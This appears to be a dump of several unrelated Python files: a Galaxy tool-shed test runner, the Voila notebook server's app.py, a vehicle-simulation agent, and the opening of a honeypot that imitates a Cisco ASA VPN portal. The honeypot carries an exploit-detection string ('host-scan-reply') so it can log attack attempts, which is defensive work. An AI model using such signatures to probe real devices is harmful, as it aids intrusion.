install_galaxy_db_path = os.path.join( galaxy_db_path, 'install.sqlite' )
install_galaxy_database_connection = 'sqlite:///%s' % install_galaxy_db_path
tool_shed_global_conf = get_webapp_global_conf()
tool_shed_global_conf[ '__file__' ] = 'tool_shed_wsgi.ini.sample'
kwargs = dict( admin_users = 'test@bx.psu.edu',
allow_user_creation = True,
allow_user_deletion = True,
database_connection = toolshed_database_connection,
datatype_converters_config_file = 'datatype_converters_conf.xml.sample',
file_path = shed_file_path,
global_conf = tool_shed_global_conf,
hgweb_config_dir = hgweb_config_dir,
job_queue_workers = 5,
id_secret = 'changethisinproductiontoo',
log_destination = "stdout",
new_file_path = new_repos_path,
running_functional_tests = True,
shed_tool_data_table_config = shed_tool_data_table_conf_file,
smtp_server = 'smtp.dummy.string.tld',
email_from = 'functional@localhost',
template_path = 'templates',
tool_path=tool_path,
tool_parse_help = False,
tool_data_table_config_path = galaxy_tool_data_table_conf_file,
use_heartbeat = False )
for dir in [ tool_shed_test_tmp_dir ]:
try:
os.makedirs( dir )
except OSError:
pass
print "Tool shed database connection:", toolshed_database_connection
print "Galaxy database connection:", galaxy_database_connection
# Generate the tool_data_table_conf.xml file.
file( galaxy_tool_data_table_conf_file, 'w' ).write( tool_data_table_conf_xml_template )
# Generate the shed_tool_data_table_conf.xml file.
file( shed_tool_data_table_conf_file, 'w' ).write( tool_data_table_conf_xml_template )
os.environ[ 'TOOL_SHED_TEST_TOOL_DATA_TABLE_CONF' ] = shed_tool_data_table_conf_file
# ---- Build Tool Shed Application --------------------------------------------------
toolshedapp = None
# if not toolshed_database_connection.startswith( 'sqlite://' ):
# kwargs[ 'database_engine_option_max_overflow' ] = '20'
if tool_dependency_dir is not None:
kwargs[ 'tool_dependency_dir' ] = tool_dependency_dir
if use_distributed_object_store:
kwargs[ 'object_store' ] = 'distributed'
kwargs[ 'distributed_object_store_config_file' ] = 'distributed_object_store_conf.xml.sample'
kwargs[ 'global_conf' ] = tool_shed_global_conf
if not toolshed_database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_pool_size' ] = '10'
toolshedapp = ToolshedUniverseApplication( **kwargs )
database_contexts.tool_shed_context = toolshedapp.model.context
log.info( "Embedded Toolshed application started" )
# ---- Run tool shed webserver ------------------------------------------------------
tool_shed_server = None
tool_shed_global_conf[ 'database_connection' ] = toolshed_database_connection
toolshedwebapp = toolshedbuildapp.app_factory( tool_shed_global_conf,
use_translogger=False,
static_enabled=True,
app=toolshedapp )
if tool_shed_test_port is not None:
tool_shed_server = httpserver.serve( toolshedwebapp, host=tool_shed_test_host, port=tool_shed_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
tool_shed_test_port = str( random.randint( default_tool_shed_test_port_min, default_tool_shed_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s" % tool_shed_test_port )
tool_shed_server = httpserver.serve( toolshedwebapp, host=tool_shed_test_host, port=tool_shed_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( default_tool_shed_test_port_min, default_tool_shed_test_port_max ) )
if tool_shed_test_proxy_port:
os.environ[ 'TOOL_SHED_TEST_PORT' ] = tool_shed_test_proxy_port
else:
os.environ[ 'TOOL_SHED_TEST_PORT' ] = tool_shed_test_port
t = threading.Thread( target=tool_shed_server.serve_forever )
t.start()
# Test if the server is up
for i in range( 10 ):
# Directly test the app, not the proxy.
conn = httplib.HTTPConnection( tool_shed_test_host, tool_shed_test_port )
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded web server started" )
# ---- Optionally start up a Galaxy instance ------------------------------------------------------
if 'TOOL_SHED_TEST_OMIT_GALAXY' not in os.environ:
# Generate the tool_conf.xml file.
file( galaxy_tool_conf_file, 'w' ).write( tool_conf_xml )
# Generate the shed_tool_conf.xml file.
tool_sheds_conf_template_parser = string.Template( tool_sheds_conf_xml_template )
tool_sheds_conf_xml = tool_sheds_conf_template_parser.safe_substitute( shed_url=tool_shed_test_host, shed_port=tool_shed_test_port )
file( galaxy_tool_sheds_conf_file, 'w' ).write( tool_sheds_conf_xml )
# Generate the tool_sheds_conf.xml file.
shed_tool_conf_template_parser = string.Template( shed_tool_conf_xml_template )
shed_tool_conf_xml = shed_tool_conf_template_parser.safe_substitute( shed_tool_path=galaxy_shed_tool_path )
file( galaxy_shed_tool_conf_file, 'w' ).write( shed_tool_conf_xml )
# Generate the migrated_tool_conf.xml file.
migrated_tool_conf_xml = shed_tool_conf_template_parser.safe_substitute( shed_tool_path=galaxy_migrated_tool_path )
file( galaxy_migrated_tool_conf_file, 'w' ).write( migrated_tool_conf_xml )
os.environ[ 'GALAXY_TEST_SHED_TOOL_CONF' ] = galaxy_shed_tool_conf_file
# Generate shed_data_manager_conf.xml
if not os.environ.get( 'GALAXY_SHED_DATA_MANAGER_CONF' ):
open( galaxy_shed_data_manager_conf_file, 'wb' ).write( shed_data_manager_conf_xml_template )
galaxy_global_conf = get_webapp_global_conf()
galaxy_global_conf[ '__file__' ] = 'universe_wsgi.ini.sample'
kwargs = dict( allow_user_creation = True,
allow_user_deletion = True,
admin_users = 'test@bx.psu.edu',
allow_library_path_paste = True,
install_database_connection = install_galaxy_database_connection,
database_connection = galaxy_database_connection,
database_auto_migrate = galaxy_database_auto_migrate,
datatype_converters_config_file = "datatype_converters_conf.xml.sample",
enable_tool_shed_check = True,
file_path = galaxy_file_path,
global_conf = galaxy_global_conf,
hours_between_check = 0.001,
id_secret = 'changethisinproductiontoo',
job_queue_workers = 5,
log_destination = "stdout",
migrated_tools_config = galaxy_migrated_tool_conf_file,
new_file_path = galaxy_tempfiles,
running_functional_tests=True,
shed_data_manager_config_file = galaxy_shed_data_manager_conf_file,
shed_tool_data_table_config = shed_tool_data_table_conf_file,
shed_tool_path = galaxy_shed_tool_path,
template_path = "templates",
tool_data_path = tool_data_path,
tool_dependency_dir = galaxy_tool_dependency_dir,
tool_path = tool_path,
tool_config_file = [ galaxy_tool_conf_file, galaxy_shed_tool_conf_file ],
tool_sheds_config_file = galaxy_tool_sheds_conf_file,
tool_parse_help = False,
tool_data_table_config_path = galaxy_tool_data_table_conf_file,
update_integrated_tool_panel = False,
use_heartbeat = False )
# ---- Build Galaxy Application --------------------------------------------------
if not galaxy_database_connection.startswith( 'sqlite://' ) and not install_galaxy_database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_pool_size' ] = '10'
kwargs[ 'database_engine_option_max_overflow' ] = '20'
galaxyapp = GalaxyUniverseApplication( **kwargs )
log.info( "Embedded Galaxy application started" )
# ---- Run galaxy webserver ------------------------------------------------------
galaxy_server = None
galaxy_global_conf[ 'database_file' ] = galaxy_database_connection
galaxywebapp = galaxybuildapp.app_factory( galaxy_global_conf,
use_translogger=False,
static_enabled=True,
app=galaxyapp )
database_contexts.galaxy_context = galaxyapp.model.context
database_contexts.install_context = galaxyapp.install_model.context
if galaxy_test_port is not None:
galaxy_server = httpserver.serve( galaxywebapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s" % galaxy_test_port )
galaxy_server = httpserver.serve( galaxywebapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % \
( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
if galaxy_test_proxy_port:
os.environ[ 'GALAXY_TEST_PORT' ] = galaxy_test_proxy_port
else:
os.environ[ 'GALAXY_TEST_PORT' ] = galaxy_test_port
t = threading.Thread( target=galaxy_server.serve_forever )
t.start()
# Test if the server is up
for i in range( 10 ):
# Directly test the app, not the proxy.
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port )
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded galaxy web server started" )
# We don't add the tests to the path until everything is up and running
new_path = [ os.path.join( cwd, 'test' ) ]
new_path.extend( sys.path[1:] )
sys.path = new_path
# ---- Find tests ---------------------------------------------------------
if tool_shed_test_proxy_port:
log.info( "Functional tests will be run against %s:%s" % ( tool_shed_test_host, tool_shed_test_proxy_port ) )
else:
log.info( "Functional tests will be run against %s:%s" % ( tool_shed_test_host, tool_shed_test_port ) )
if galaxy_test_proxy_port:
log.info( "Galaxy tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_proxy_port ) )
else:
log.info( "Galaxy tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_port ) )
success = False
try:
# Pass in through script set env, will leave a copy of ALL test validate files.
os.environ[ 'TOOL_SHED_TEST_HOST' ] = tool_shed_test_host
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
if tool_shed_test_file_dir:
os.environ[ 'TOOL_SHED_TEST_FILE_DIR' ] = tool_shed_test_file_dir
test_config = nose.config.Config( env=os.environ, ignoreFiles=ignore_files, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.configure( sys.argv )
# Run the tests.
result = run_tests( test_config )
success = result.wasSuccessful()
except:
log.exception( "Failure running tests" )
log.info( "Shutting down" )
# ---- Tear down -----------------------------------------------------------
if tool_shed_server:
log.info( "Shutting down embedded web server" )
tool_shed_server.server_close()
tool_shed_server = None
log.info( "Embedded web server stopped" )
if toolshedapp:
log.info( "Shutting down tool shed app" )
toolshedapp.shutdown()
toolshedapp = None
log.info( "Embedded tool shed application stopped" )
if 'TOOL_SHED_TEST_OMIT_GALAXY' not in os.environ:
if galaxy_server:
log.info( "Shutting down galaxy web server" )
galaxy_server.server_close()
galaxy_server = None
log.info( "Embedded galaxy server stopped" )
if galaxyapp:
log.info( "Shutting down galaxy app" )
galaxyapp.shutdown()
galaxyapp = None
log.info( "Embedded galaxy application stopped" )
if 'TOOL_SHED_TEST_NO_CLEANUP' not in os.environ:
try:
for dir in [ tool_shed_test_tmp_dir ]:
if os.path.exists( dir ):
log.info( "Cleaning up temporary files in %s" % dir )
shutil.rmtree( dir )
except:
pass
if success:
return 0
else:
return 1
def __copy_database_template( source, db_path ):
"""
Copy a 'clean' sqlite template database (from file or URL) to specified
database path.
"""
os.makedirs( os.path.dirname( db_path ) )
if os.path.exists( source ):
shutil.copy( source, db_path )
assert os.path.exists( db_path )
elif source.startswith("http"):
urllib.urlretrieve( source, db_path )
else:
raise Exception( "Failed to copy database template from source %s" % source )
if __name__ == "__main__":
try:
sys.exit( main() )
except Exception, e:
log.exception( str( e ) )
exit(1)
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voila Contributors #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
from zmq.eventloop import ioloop
import gettext
import io
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import MappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import path_regex
from jupyter_server.utils import url_path_join
from jupyter_server.services.config import ConfigManager
from jupyter_server.base.handlers import FileFindHandler
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, notebook_path_regex
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutePreprocessor
from .exporter import VoilaExporter
from .csspreprocessor import VoilaCSSPreprocessor
ioloop.install()
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': ({'Voila': {'log_level': logging.DEBUG}}, _("Set the log level to logging.DEBUG")),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the voila server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload to server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions'
}
classes = [
VoilaConfiguration,
VoilaExecutePreprocessor,
VoilaExporter,
VoilaCSSPreprocessor
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporry connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for voila API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to voila API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with voila'
)
)
nbconvert_template_paths = List(
[],
config=True,
help=_(
'path to nbconvert templates'
)
)
template_paths = List(
[],
allow_none=True,
config=True,
help=_(
'path to nbconvert templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def initialize(self, argv=None):
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# but that cli config has preference, so we overwrite with that
self.update_config(self.cli_config)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
collect_template_paths(
self.nbconvert_template_paths,
self.static_paths,
self.template_paths,
self.voila_configuration.template)
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('nbconvert template paths:\n\t%s', '\n\t'.join(self.nbconvert_template_paths))
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
self.kernel_manager = MappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
}
)
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler),
(url_path_join(self.server_url, r'/voila/tree' + path_regex), VoilaTreeHandler),
(url_path_join(self.server_url, r'/voila/render' + notebook_path_regex), VoilaHandler,
{
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
self.kernel_manager.shutdown_all()
def listen(self):
self.app.listen(self.port)
self.log.info('Voila is running at:\n%s' % self.display_url)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
agent.py
|
import time
import math
from threading import Thread
import vehicle
msgHeader = "[AGENT]: "
class Agent():
def __init__(self, ID, agentType="robot", vehicleType="car", strategyFile=None):
self.ID = str(ID)
if vehicleType.lower() == "car":
self.vehicle = vehicle.Car(self)
elif vehicleType.lower() == "truck":
self.vehicle = vehicle.Truck(self)
elif vehicleType.lower() == "motorcycle":
self.vehicle = vehicle.Motorcycle(self)
elif vehicleType.lower() == "bicycle":
self.vehicle = vehicle.Bicycle(self)
else:
print(msgHeader + "Could not initialise Agent " + self.ID + " with vehicle type '" + vehicleType + "'.")
self.vehicle = vehicle.Car(self)
self.worldKnowledge = {}
self.strategy = None
if strategyFile is not None:
try:
self.strategy = import_file("strategy", strategyFile)
print(msgHeader + "Successfully loaded the strategy file for Agent " + self.ID + ".")
except:
print(msgHeader + "Could not load the strategy file for Agent " + self.ID + ". (Fatal)")
exit()
self.stopped = False
def start(self):
t_process = Thread(target=self.update)
t_process.daemon = True
t_process.start()
return self
def update(self):
while True:
if self.stopped or not self.strategy:
return
self.strategy.make_decision(self)
time.sleep(0.2)
def stop(self):
self.vehicle.stop()
self.stopped = True
def update_world_knowledge(self, worldData):
for key in self.worldKnowledge:
if key in worldData:
self.worldKnowledge[key] = worldData[key]
def aim_speed(self, speed):
cspeed = self.vehicle.current_speed
if (cspeed is None):
cspeed = 0
if (speed > cspeed):
diff = speed - cspeed
if (diff > self.vehicle.max_acceleration):
diff = self.vehicle.max_acceleration
self.vehicle.set_speed(cspeed + diff)
else:
diff = cspeed - speed
if (diff > self.vehicle.max_deceleration):
diff = self.vehicle.max_deceleration
self.vehicle.set_speed(cspeed - diff)
def aim_angle(self, angle):
cangle = self.vehicle.orientation
if (cangle is None):
cangle = 0
diff = int(math.fabs(angle - cangle))
if (diff > 180):
diff = 360 - diff
if (cangle < angle):
da = -diff
else:
da = diff
else:
if (cangle < angle):
da = diff
else:
da = -diff
self.vehicle.set_angle(da // 3)
def get_vector_between_points(self, x1, y1, x2, y2):
if (x1 != None and y1 != None):
dx = x2 - x1
dy = y2 - y1
dist = int(math.sqrt(dx * dx + dy * dy))
theta = 0
if (dx != 0):
theta = math.atan(dy / dx) * (180 / math.pi)
if (dx == 0):
if (dy <= 0):
theta = 0
else:
theta = 180
elif (dy == 0):
if (dx < 0):
theta = 270
else:
theta = 90
elif (dx > 0 and dy > 0):
theta = theta + 90
elif (dx > 0 and dy < 0):
theta = theta + 90
elif (dx < 0 and dy > 0):
theta = theta + 270
elif (dx < 0 and dy < 0):
theta = theta + 270
return (dist, theta)
return (None, None)
# Return Distance and Angle to current waypoint. Angle must be degrees clockwise from north
def get_vector_to_waypoint(self):
if (self.vehicle.position[0] != None and self.vehicle.position[1] != None):
wpi = self.get_waypoint_index()
if (wpi != None):
if (self.worldKnowledge['waypoints'] != []):
x1 = self.vehicle.position[0]
y1 = self.vehicle.position[1]
x2 = self.worldKnowledge['waypoints'][wpi][0]
y2 = self.worldKnowledge['waypoints'][wpi][1]
return self.get_vector_between_points(x1, y1, x2, y2)
return (None, None)
# Return current waypoint index
def get_waypoint_index(self):
return self.worldKnowledge['waypoint_index']
# Set current waypoint index
def set_waypoint_index(self, wp):
mmax = len(self.worldKnowledge['waypoints']) - 1
if (wp > mmax):
wp = 0
if (wp < 0):
wp = mmax
self.worldKnowledge['waypoint_index'] = wp
def import_file(full_name, path):
from importlib import util
spec = util.spec_from_file_location(full_name, path)
mod = util.module_from_spec(spec)
spec.loader.exec_module(mod)
return mod
|
asa_server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import socket
import logging
import threading
from io import BytesIO
from xml.etree import ElementTree
from http.server import HTTPServer
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler
import ike_server
import datetime
class NonBlockingHTTPServer(ThreadingMixIn, HTTPServer):
pass
class hpflogger:
def __init__(self, hpfserver, hpfport, hpfident, hpfsecret, hpfchannel, serverid, verbose):
self.hpfserver=hpfserver
self.hpfport=hpfport
self.hpfident=hpfident
self.hpfsecret=hpfsecret
self.hpfchannel=hpfchannel
self.serverid=serverid
self.hpc=None
self.verbose=verbose
if (self.hpfserver and self.hpfport and self.hpfident and self.hpfport and self.hpfchannel and self.serverid):
import hpfeeds
try:
self.hpc = hpfeeds.new(self.hpfserver, self.hpfport, self.hpfident, self.hpfsecret)
logger.debug("Logging to hpfeeds using server: {0}, channel {1}.".format(self.hpfserver, self.hpfchannel))
except (hpfeeds.FeedException, socket.error, hpfeeds.Disconnect):
logger.critical("hpfeeds connection not successful")
def log(self, level, message):
if self.hpc:
if level in ['debug', 'info'] and not self.verbose:
return
self.hpc.publish(self.hpfchannel, "["+self.serverid+"] ["+level+"] ["+datetime.datetime.now().isoformat() +"] " + str(message))
def header_split(h):
return [list(map(str.strip, l.split(': ', 1))) for l in h.strip().splitlines()]
class WebLogicHandler(SimpleHTTPRequestHandler):
logger = None
hpfl = None
protocol_version = "HTTP/1.1"
EXPLOIT_STRING = b"host-scan-reply"
RESPONSE = b"""<?xml version="1.0" encoding="UTF-8"?>
<config-auth client="vpn" type="complete">
<version who="sg">9.0(1)</version>
<error id="98" param1="" param2="">VPN Server could not parse request.</error>
</config-auth>"""
basepath = os.path.dirname(os.path.abspath(__file__))
alert_function = None
def setup(self):
SimpleHTTPRequestHandler.setup(self)
self.request.settimeout(3)
def send_header(self, keyword, value):
if keyword.lower() == 'server':
return
SimpleHTTPRequestHandler.send_header(self, keyword, value)
def send_head(self):
# send_head will return a file object that do_HEAD/GET will use
# do_GET/HEAD are already implemented by SimpleHTTPRequestHandler
filename = os.path.basename(self.path.rstrip('/').split('?', 1)[0])
if self.path == '/':
self.send_response(200)
for k, v in header_split("""
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tg=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnc=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpn_portal=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnSharePoint=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
Set-Cookie: webvpnlogin=1; path=/; secure
Set-Cookie: sdesktop=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
"""):
self.send_header(k, v)
self.end_headers()
return BytesIO(b'<html><script>document.location.replace("/+CSCOE+/logon.html")</script></html>\n')
elif filename == 'asa': # don't allow dir listing
return self.send_file('wrong_url.html', 403)
else:
return self.send_file(filename)
def redirect(self, loc):
self.send_response(302)
for k, v in header_split("""
Content-Type: text/html
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Location: %s
Set-Cookie: tg=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; secure
""" % (loc,)):
self.send_header(k, v)
self.end_headers()
def do_GET(self):
